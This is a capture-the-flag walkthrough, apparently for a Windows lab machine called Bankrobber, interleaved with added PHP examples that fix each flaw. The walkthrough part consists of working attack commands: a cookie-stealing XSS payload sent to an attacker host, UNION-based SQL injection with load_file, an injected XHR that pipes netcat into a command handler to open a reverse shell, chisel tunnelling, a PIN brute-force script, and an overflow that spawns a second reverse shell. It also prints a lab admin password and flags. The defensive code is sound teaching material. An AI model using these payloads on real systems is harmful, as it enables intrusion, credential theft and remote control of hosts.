Service overview
$ nmapAutomator.sh -H 10.10.10.154 -t Full
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp open ssl/http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4m06s, deviation: 0s, median: 4m06s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-04T11:00:22
|_ start_date: 2021-06-04T10:55:07
Web
- register a user:
123user:123user123
- id, username and password are stored as cookies (base64-encoded)
Send coins to someone => the admin reviews the transaction.
Put an XSS payload in the comment field:
javascript:document.write('<script>img = new Image(); img.src = "http://10.10.14.6/img.gif?"+document.cookie;</script>')
Start a web server: python3 -m http.server 80
=>
"GET /img.gif?username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -
=> base64-decoded: admin:Hopelessromantic
=> log in as admin.
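Added example (PHP, not code from the writeup or from the E-coin application): the two server-side changes that break this cookie-theft chain. The transfer comment is HTML-encoded before the admin's page renders it, and the login issues an HttpOnly, Secure, SameSite session cookie instead of writing the username and password into cookies. Function names, the session layout and the sample comment are assumptions; the same encoding applies to the script-tag comment used later in the writeup.

```php
<?php
// Added example, not code from the writeup or from the E-coin application.
// Encode untrusted comments before rendering and keep the credential out of
// the cookie jar so that document.cookie has nothing worth exfiltrating.
declare(strict_types=1);

// Encode any untrusted string placed into HTML text or attribute context.
// ENT_QUOTES covers both quote styles (attribute context); ENT_SUBSTITUTE
// keeps malformed UTF-8 from silently blanking the whole string.
function render_comment(string $comment): string
{
    return htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Cookie attributes for session_set_cookie_params(): HttpOnly hides the
// cookie from script, Secure limits it to TLS, SameSite=Strict keeps it off
// cross-site requests such as a forged POST to transfer.php.
function session_cookie_options(): array
{
    return [
        'expires'  => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ];
}

// Replace the id/username/password cookies with an opaque server-side
// session. Assumed: called from the login handler after the password has
// been verified against its stored hash; the password itself is never
// written anywhere the browser can read.
function start_authenticated_session(int $userId, string $username): void
{
    session_set_cookie_params(session_cookie_options());
    session_start();
    session_regenerate_id(true);   // fresh id after the privilege change
    $_SESSION['id'] = $userId;
    $_SESSION['username'] = $username;
}

if (PHP_SAPI === 'cli') {
    // Constructed input: the script-tag comment from the writeup, run through
    // the encoder exactly as the admin's transaction page would render it.
    $comment = '<script src="http://10.10.14.6/script.js"></script>';
    echo render_comment($comment), PHP_EOL;
}
```

Encoding is sufficient when the comment is rendered as text. If the application ever places a comment into an href or similar URL attribute, the `javascript:` form of the payload also needs a scheme allowlist (http/https) on top of the encoding.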
Xampp
https://10.10.10.154/notes.txt => default XAMPP folder (C:\xampp)
SQL Injection
Try in the user search:
1 and 1=1
Use Burp Repeater to determine the number of columns:
term=1'+order+by+3--+- - ok
term=1'+order+by+4--+- - not ok
=> 3 columns
term=1'+union+select+user(),2,3--+-
root@localhost
term=1'+union+select+database(),2,3--+-
bankrobber
term=1'+union+select+load_file("C:/xampp/htdocs/admin/backdoorchecker.php"),2,3--+-
<?php
include('../link.php');
include('auth.php');
$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad = array('$(','&');
$good = "ls";
if(strtolower(substr(PHP_OS,0,3)) == "win"){
    $good = "dir";
}
if($username == "admin" && $password == "Hopelessromantic"){
    if(isset($_POST['cmd'])){
        // FILTER ESCAPE CHARS
        foreach($bad as $char){
            if(strpos($_POST['cmd'],$char) !== false){
                die("You're not allowed to do that.");
            }
        }
        // CHECK IF THE FIRST 2 CHARS ARE LS
        if(substr($_POST['cmd'], 0,strlen($good)) != $good){
            die("It's only allowed to use the $good command");
        }
        if($_SERVER['REMOTE_ADDR'] == "::1"){
            system($_POST['cmd']);
        } else{
            echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
        }
    }
} else{
    echo "You are not allowed to use this function!";
}
?>
=> the pipe character | is not filtered.
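Added example (PHP, not code from the writeup or from the E-coin application): a parameterised replacement for the user-search query that the `term=1'+union+select` requests above exploit. The query result `root@localhost` shows the application connecting as the database superuser, which is what makes `load_file()` available; the example therefore also keeps the selected columns minimal. SQLite in memory is used only so the file runs stand-alone; the table layout and sample rows are constructed, and the prepare/execute pattern is identical for MariaDB through the pdo_mysql driver.

```php
<?php
// Added example, not code from the writeup or from the E-coin application.
// The search term is bound as a parameter, so quotes, UNION and comment
// sequences in it are matched as text rather than parsed as SQL.
declare(strict_types=1);

function connect_demo_db(): PDO
{
    // SQLite in memory stands in for the bankrobber database; rows constructed.
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    $db->exec("INSERT INTO users VALUES (1, 'admin', 'x'), (2, 'gio', 'x'), (3, '123user', 'x')");
    return $db;
}

// Escape the LIKE metacharacters with an explicit ESCAPE character so that a
// search for "%" or "_" matches literally. "!" works the same way in MariaDB
// and SQLite; a bare backslash is interpreted differently by the two.
function like_literal(string $term): string
{
    return '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term) . '%';
}

function search_users(PDO $db, string $term): array
{
    // Whatever the term contains, the statement stays one SELECT with one
    // predicate: no extra columns, no UNION, no load_file(). Only id and
    // username are selected, so the password column never reaches the page.
    $stmt = $db->prepare(
        "SELECT id, username FROM users WHERE username LIKE ? ESCAPE '!' ORDER BY id LIMIT 50"
    );
    $stmt->execute([like_literal($term)]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

if (PHP_SAPI === 'cli') {
    $db = connect_demo_db();
    // A normal search, then the column-count probe from the writeup: the
    // probe is treated as an (unmatched) username, not as SQL.
    foreach (['user', "1' order by 3-- -"] as $term) {
        printf("%-22s -> %s\n", $term, json_encode(search_users($db, $term)));
    }
}
```

Alongside the code change, the application should connect with a dedicated MariaDB account granted only SELECT/INSERT/UPDATE on its own database; without the FILE privilege (and with secure_file_priv set) an injection that did slip through could no longer read files from the web root.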
$ nano script.js:
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | \\\\10.10.14.6\\share\\nc.exe 10.10.14.6 1234 -e cmd.exe";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);
Start an SMB server:
smbserver.py -smb2support share $(pwd)
nc -lnvp 1234
Send the transaction via Burp:
POST /user/transfer.php HTTP/1.1
Host: 10.10.10.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://10.10.10.154
Connection: close
Referer: http://10.10.10.154/user/
Cookie: id=3; username=MTIzdXNlcg%3D%3D; password=MTIzdXNlcjEyMw%3D%3D
fromId=3&toId=1&amount=1&comment=<script+src="http://10.10.14.6/script.js"></script>
Start the web server: python3 -m http.server 80.
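Added example (PHP, not code from the writeup or from the E-coin application): a hardened replacement for the command handler in backdoorchecker.php. The original blacklists `$(` and `&`, checks only that the input starts with `dir`, and trusts `REMOTE_ADDR == ::1`, so `dir | ...` reaches `system()` as soon as the request is made from the admin's own browser. The fix is not a longer blacklist: the handler never spawns a shell, and it requires a per-session CSRF token so a request carried by the admin's browser is rejected. The base directory, function names and session layout are assumptions.

```php
<?php
// Added example, not code from the writeup or from the E-coin application.
// The one operation the page needs (a directory listing) is implemented with
// scandir() inside an allowlisted base path; no process is started.
declare(strict_types=1);

// Parse "dir" or "dir <relative path>" into the relative path. Anything else
// (pipes, redirections, cmd.exe metacharacters, absolute paths) is rejected
// rather than filtered. Segments may not start with a dot, so "." and ".."
// never match; realpath() below is the second line of defence.
function parse_listing_request(string $cmd): ?string
{
    $segment = '[A-Za-z0-9_][A-Za-z0-9_.\-]*';
    if (!preg_match("~^dir(?: ($segment(?:/$segment)*))?$~", $cmd, $m)) {
        return null;
    }
    return $m[1] ?? '';
}

// Directory listing confined to $base (assumed base directory passed in).
function list_directory(string $base, string $relative): array
{
    $baseReal = realpath($base);
    $target = realpath($relative === '' ? $base : $base . DIRECTORY_SEPARATOR . $relative);
    if ($baseReal === false || $target === false
        || strncmp($target . DIRECTORY_SEPARATOR, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        throw new RuntimeException('path outside the listing base');
    }
    return array_values(array_diff(scandir($target), ['.', '..']));
}

// A request that arrives with the admin's cookies is not proof the admin sent
// it (the injected script.js makes the browser send one). Require a token that
// only a page rendered by this server could have included.
function csrf_token_valid(?string $sent, ?string $expected): bool
{
    return $sent !== null && $expected !== null && hash_equals($expected, $sent);
}

// Assumed context: an HttpOnly session cookie identifies the admin and
// $_SESSION['csrf'] was set when the form was rendered.
function handle_listing(array $post, array $session, string $base): string
{
    if (!csrf_token_valid($post['csrf'] ?? null, $session['csrf'] ?? null)) {
        return 'Request rejected: missing or invalid CSRF token.';
    }
    $relative = parse_listing_request($post['cmd'] ?? '');
    if ($relative === null) {
        return "It's only allowed to use the dir command";
    }
    return implode(PHP_EOL, list_directory($base, $relative));
}

if (PHP_SAPI === 'cli') {
    $token = bin2hex(random_bytes(16));
    $session = ['csrf' => $token];
    // Constructed requests: the pipe payload from the writeup, then a plain
    // listing of this script's own directory.
    $pipe = 'dir | \\\\10.10.14.6\\share\\nc.exe 10.10.14.6 1234 -e cmd.exe';
    echo handle_listing(['cmd' => $pipe, 'csrf' => $token], $session, __DIR__), PHP_EOL;
    echo handle_listing(['cmd' => 'dir', 'csrf' => $token], $session, __DIR__), PHP_EOL;
}
```

The `==` comparison of a base64 cookie against a hard-coded password in the original is replaced here by the session check; with the password no longer in any cookie, the XSS-to-XHR chain has neither a credential to forward nor a token to supply.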
User flag
C:\Users\Cortin\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::558a:2e46:9d1f:9962
Temporary IPv6 Address. . . . . . : dead:beef::423:ec2c:39c7:2b02
Link-local IPv6 Address . . . . . : fe80::558a:2e46:9d1f:9962%2
IPv4 Address. . . . . . . . . . . : 10.10.10.154
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%2
10.10.10.2
Tunnel adapter isatap.{0637FAE2-5EF8-43F7-ADAC-E58020091A92}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Cortin\Desktop>type user.txt
f635346600876a43441cf1c6e94769ac
Privilege escalation
$ netstat -anop TCP
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 2904
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 748
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2904
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:910 0.0.0.0:0 LISTENING 1620
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1828
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 464
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 920
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 892
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1416
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 592
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 600
TCP 10.10.10.154:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.154:49848 10.10.14.6:445 ESTABLISHED 4
TCP 10.10.10.154:49850 10.10.14.6:1234 ESTABLISHED 4160
TCP 127.0.0.1:3306 127.0.0.1:49846 ESTABLISHED 1828
TCP 127.0.0.1:3306 127.0.0.1:49847 ESTABLISHED 1828
TCP 127.0.0.1:49846 127.0.0.1:3306 ESTABLISHED 3156
TCP 127.0.0.1:49847 127.0.0.1:3306 ESTABLISHED 3156
TCP 127.0.0.1:49854 127.0.0.1:3306 TIME_WAIT 0
=> port 910 looks unusual (listening on all interfaces, but not reachable from outside).
Port Forwarding
Use Chisel:
$ wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_windows_amd64.gz
$ gunzip chisel..
(Windows build for the target; the Linux build for the attacking host is at https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_linux_amd64.gz)
$ ./chisel server --port 5555 -reverse
And on the target machine:
certutil -urlcache -f "http://10.10.14.6/chisel_1.7.6_windows_amd64" chisel.exe
chisel client 10.10.14.6:5555 R:910:127.0.0.1:910
On the local machine:
$ nc 127.0.0.1 910
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church
v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 1234
[!] Access denied, disconnecting client....
Write a brute-force script, code.py:
import socket

# Try every 4-digit PIN; the service disconnects after one wrong guess,
# so a new connection is opened for each attempt.
for i in range(0, 10000):
    code = "0" * (4 - len(str(i))) + str(i)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("localhost", 910))
    data = s.recv(8192)                      # banner and PIN prompt
    s.send(code.encode() + b"\n")
    data = s.recv(8192).decode("utf-8")
    s.close()
    if "Access denied" not in data:
        print(f"valid code: {code}")
        break
$ python code.py
0021
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church
v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 0021
[$] PIN is correct, access granted!
--------------------------------------------------------------
Please enter the amount of e-coins you would like to transfer:
[$] 100
[$] Transfering $100 using our e-coin transfer application.
[$] Executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe
[$] Transaction in progress, you can safely disconnect...
=> try a buffer overflow => copy nc.exe to C:\users\public\nc.exe
Then:
$ nc -lnvp 1235
$ nc localhost 910
0021
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC:\Users\Public\nc.exe 10.10.14.6 1235 -e cmd.exe
Root flag
C:\Users\admin\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::558a:2e46:9d1f:9962
Temporary IPv6 Address. . . . . . : dead:beef::423:ec2c:39c7:2b02
Link-local IPv6 Address . . . . . : fe80::558a:2e46:9d1f:9962%2
IPv4 Address. . . . . . . . . . . : 10.10.10.154
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%2
10.10.10.2
Tunnel adapter isatap.{0637FAE2-5EF8-43F7-ADAC-E58020091A92}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\admin\Desktop>type root.txt
aa65d8e6216585ea636eb07d4a59b197